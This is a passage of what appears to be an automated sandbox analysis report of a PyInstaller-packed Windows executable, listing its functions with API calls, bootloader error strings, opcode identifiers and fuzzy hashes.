                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b04046989d87c8dc885ed01c2b3f2aaa9c0b13633c97905e42662c4d2108a614
                                                    • Instruction ID: df5a0feac41a9a349029aba4658e2bc5f5e98079faa9b08864d0a63a8c49175e
                                                    • Opcode Fuzzy Hash: b04046989d87c8dc885ed01c2b3f2aaa9c0b13633c97905e42662c4d2108a614
                                                    • Instruction Fuzzy Hash: 08A00162918862D0EA44CB00AC510212231ABA538CB59203AD11EB14A09EBCA454D210
                                                    Function 00007FF652ED7100 Relevance: 164.8, APIs: 31, Strings: 63, Instructions: 263libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                    • API String ID: 190572456-2208601799
                                                    • Opcode ID: e7edea845a9f5d5bc22b5b56991a1be592abbf01ed24a972618679d5ebca8c04
                                                    • Instruction ID: c579ba99fa0a5b56ce965958822bc80d806c52348fa23ec8eef5a03628f233d6
                                                    • Opcode Fuzzy Hash: e7edea845a9f5d5bc22b5b56991a1be592abbf01ed24a972618679d5ebca8c04
                                                    • Instruction Fuzzy Hash: 3FE1E461A1DB2391FB59CB04BC8017523A2AF4479CF9C663DD80EA63A4EFFCF5588250
                                                    Function 00007FF652ED12A0 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 136COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Message_fread_nolock
                                                    • String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
                                                    • API String ID: 3065259568-2316137593
                                                    • Opcode ID: 8e0a080ed0e30a437069437fae51ddaf79e1ee31648d61ffe3286270281b1de1
                                                    • Instruction ID: dd3d29c2eeef47ad8201db157ae821b146e0d963f2199fea14814243bb89aa13
                                                    • Opcode Fuzzy Hash: 8e0a080ed0e30a437069437fae51ddaf79e1ee31648d61ffe3286270281b1de1
                                                    • Instruction Fuzzy Hash: 19517262A096A346EB209711EC513FA6354AF847C8F58503DEE4DEB696EEBCF5458300
                                                    Function 00007FF652ED23D0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                    • String ID: P%
                                                    • API String ID: 2147705588-2959514604
                                                    • Opcode ID: 5b6577cad5280a8981d528861e2ae7c646745b175b361903b18278a3a03fe9da
                                                    • Instruction ID: 91cbd18f2c9ad51c3453b48e4f2be49816e486fa4a7893bd7a8195edd608d841
                                                    • Opcode Fuzzy Hash: 5b6577cad5280a8981d528861e2ae7c646745b175b361903b18278a3a03fe9da
                                                    • Instruction Fuzzy Hash: 7B510426614BB186D6349F22B4181BBB7A1FB98B69F044129EFCE93684DF7CD045DB10
                                                    Function 00007FF652EE6CE0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: -$:$f$p$p
                                                    • API String ID: 3215553584-2013873522
                                                    • Opcode ID: d41d3ed49e0df0b37e7753a00fe59ce424ede8ed11cb6504f669504b003b63f2
                                                    • Instruction ID: e17f13b99bf0515badb2700cbb4563e4420b20a1524fac18703135ab09a40c7b
                                                    • Opcode Fuzzy Hash: d41d3ed49e0df0b37e7753a00fe59ce424ede8ed11cb6504f669504b003b63f2
                                                    • Instruction Fuzzy Hash: B412D721E0C26386FB609F15D8446BD7661FB80758F9C413DE699A76C8DFBCE980CB10
                                                    Function 00007FF652EE18F8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: f$f$p$p$f
                                                    • API String ID: 3215553584-1325933183
                                                    • Opcode ID: d738f100ea2c585e80d131aafbe2a69e2e0acbd3b76fe5cf90b2b638373c2978
                                                    • Instruction ID: c2247588ec34ee3bde328560407cfaee526decead260e85659243b12e073afad
                                                    • Opcode Fuzzy Hash: d738f100ea2c585e80d131aafbe2a69e2e0acbd3b76fe5cf90b2b638373c2978
                                                    • Instruction Fuzzy Hash: 0212B561E0C1A386FB249A15DC542B97661FB80758F9C4139E69AEE6C4DFBCECC0CB11
                                                    Function 00007FF652ED1590 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 99COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Message
                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                    • API String ID: 2030045667-3659356012
                                                    • Opcode ID: 78e786674cf019aa4bfc43b56c2618f7f7dd3a536dd5cfde84b8df6acfdb4e98
                                                    • Instruction ID: ef33cb4c3f559cedaaf8ba331cb47bb10f40adfc616c58131f082e6563a2d6de
                                                    • Opcode Fuzzy Hash: 78e786674cf019aa4bfc43b56c2618f7f7dd3a536dd5cfde84b8df6acfdb4e98
                                                    • Instruction Fuzzy Hash: 38318122B186A346EB20DB12FC415BA6391EF847D8F5C503DDE4DBBA95EEBCE5458300
                                                    Function 00007FF652EDF330 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 849930591-393685449
                                                    • Opcode ID: 0e2dbf0607b23b863384daf6af73d36f13a88af7ca772ada99fba3557138c94c
                                                    • Instruction ID: 26df71eb3239da0fc25ea038fc197c2d4c8abb27aae9c353821dc4219bfe4f6b
                                                    • Opcode Fuzzy Hash: 0e2dbf0607b23b863384daf6af73d36f13a88af7ca772ada99fba3557138c94c
                                                    • Instruction Fuzzy Hash: A4D1B372A087628AEB20DF65D8402AD37A0FB8579CF18413DEE8DA7B55DF78E491C740
                                                    Function 00007FF652ED89B0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF652ED101D), ref: 00007FF652ED8A47
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF652ED101D), ref: 00007FF652ED8A9E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide
                                                    • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                    • API String ID: 626452242-27947307
                                                    • Opcode ID: 400f0bdcbd62a4a5536486c2f7426be13d95d078f8c38135e0fc09a91e7db9c0
                                                    • Instruction ID: bc4c281e4c92d0185afd9c828a8316b93da89c46222c3d71012a981c33ebe396
                                                    • Opcode Fuzzy Hash: 400f0bdcbd62a4a5536486c2f7426be13d95d078f8c38135e0fc09a91e7db9c0
                                                    • Instruction Fuzzy Hash: 8141A232A08BA282E760CF15BC4016AB7A1FB84798F5C553DDA8DA7B94DFBCD456C700
                                                    Function 00007FF652ED8EF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WideCharToMultiByte.KERNEL32(?,00007FF652ED39CA), ref: 00007FF652ED8F31
                                                      • Part of subcall function 00007FF652ED29C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF652ED8AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF652ED101D), ref: 00007FF652ED29F4
                                                      • Part of subcall function 00007FF652ED29C0: MessageBoxW.USER32 ref: 00007FF652ED2AD0
                                                    • WideCharToMultiByte.KERNEL32(?,00007FF652ED39CA), ref: 00007FF652ED8FA5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLastMessage
                                                    • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                    • API String ID: 3723044601-27947307
                                                    • Opcode ID: 4b8f80f614b111e99d886447c0377d3fa2ad0085ce50da6436ff273b72e0facb
                                                    • Instruction ID: 8deb25452124b606696d1ea6b46ddb6f29930f1eb4b6632d13b42b83d19cc4c6
                                                    • Opcode Fuzzy Hash: 4b8f80f614b111e99d886447c0377d3fa2ad0085ce50da6436ff273b72e0facb
                                                    • Instruction Fuzzy Hash: E2218032B08B5685EB10DF26FC400797262EB84B88F5C453DDA4DA7B95EFBCE5518300
                                                    Function 00007FF652ED77B0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 136COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo$_fread_nolock
                                                    • String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
                                                    • API String ID: 3231891352-3501660386
                                                    • Opcode ID: 2cea5c8ce1578333e4efc4819ef4f60ece872d9265926bded31408bcde5abe9b
                                                    • Instruction ID: e55d3bef8887ad80966006a9fe5eca1181b3dd5b3f39db12b79330436921a09b
                                                    • Opcode Fuzzy Hash: 2cea5c8ce1578333e4efc4819ef4f60ece872d9265926bded31408bcde5abe9b
                                                    • Instruction Fuzzy Hash: E7519026A0D27345FB119B25AD416B962919FC9BC8F4C413DEA4DFB7D6DEACE5008340
                                                    Function 00007FF652EDE3C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF652EDE67A,?,?,?,00007FF652EDD5AC,?,?,?,00007FF652EDD1A1), ref: 00007FF652EDE44D
                                                    • GetLastError.KERNEL32(?,?,?,00007FF652EDE67A,?,?,?,00007FF652EDD5AC,?,?,?,00007FF652EDD1A1), ref: 00007FF652EDE45B
                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF652EDE67A,?,?,?,00007FF652EDD5AC,?,?,?,00007FF652EDD1A1), ref: 00007FF652EDE485
                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF652EDE67A,?,?,?,00007FF652EDD5AC,?,?,?,00007FF652EDD1A1), ref: 00007FF652EDE4F3
                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF652EDE67A,?,?,?,00007FF652EDD5AC,?,?,?,00007FF652EDD1A1), ref: 00007FF652EDE4FF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                    • String ID: api-ms-
                                                    • API String ID: 2559590344-2084034818
                                                    • Opcode ID: 5cef7e97cf10635b7adbe76254dad29ae16abfe91812266f9aed7336451ff82a
                                                    • Instruction ID: 65571612acf2d9c96afe38d96657df3c79e3de55045805099fa95fb3149f21c2
                                                    • Opcode Fuzzy Hash: 5cef7e97cf10635b7adbe76254dad29ae16abfe91812266f9aed7336451ff82a
                                                    • Instruction Fuzzy Hash: 7531C421B1AA6291EF16DB06AC045B52394BF88BA8F5D453DDD1DE7790DFBCF4848300
                                                    Function 00007FF652ED7630 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FF652ED8DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF652ED2A9B), ref: 00007FF652ED8E1A
                                                    • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF652ED7BB1,00000000,?,00000000,00000000,?,00007FF652ED153F), ref: 00007FF652ED768F
                                                      • Part of subcall function 00007FF652ED2B10: MessageBoxW.USER32 ref: 00007FF652ED2BE5
                                                    Strings
                                                    • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF652ED76EA
                                                    • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF652ED7666
                                                    • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF652ED76A3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                    • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                    • API String ID: 1662231829-3498232454
                                                    • Opcode ID: 9bfcf0b62ea921097bc7abb589b6718567d9e6fafddd2668cb98e057143b44d0
                                                    • Instruction ID: 8a4d48a0efd5d5ba5887753a86de10477b1e19c660580d8a15a6ccd8e2a1a8ad
                                                    • Opcode Fuzzy Hash: 9bfcf0b62ea921097bc7abb589b6718567d9e6fafddd2668cb98e057143b44d0
                                                    • Instruction Fuzzy Hash: 85318715B1C76240FB20D725ED253BA5291AFD87C8F8C083DDA4EE77D6EEACE5058640
                                                    Function 00007FF652ED8DE0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF652ED2A9B), ref: 00007FF652ED8E1A
                                                      • Part of subcall function 00007FF652ED29C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF652ED8AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF652ED101D), ref: 00007FF652ED29F4
                                                      • Part of subcall function 00007FF652ED29C0: MessageBoxW.USER32 ref: 00007FF652ED2AD0
                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF652ED2A9B), ref: 00007FF652ED8EA0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLastMessage
                                                    • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                    • API String ID: 3723044601-876015163
                                                    • Opcode ID: 7f97f1849ec178b0ff8ea583991b98c80d8c160445cd7602e716bcd8403426a8
                                                    • Instruction ID: 9ff212c7a1a4408712601d9362c30f0e2bf0dfa8ec17407dcfa3853bef538b3f
                                                    • Opcode Fuzzy Hash: 7f97f1849ec178b0ff8ea583991b98c80d8c160445cd7602e716bcd8403426a8
                                                    • Instruction Fuzzy Hash: 87217622B18A6281EB50CB29FC4006AA761FB847C8F5C4539DF4CE7BA9EF7DE5518700
                                                    Function 00007FF652EEBF00 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
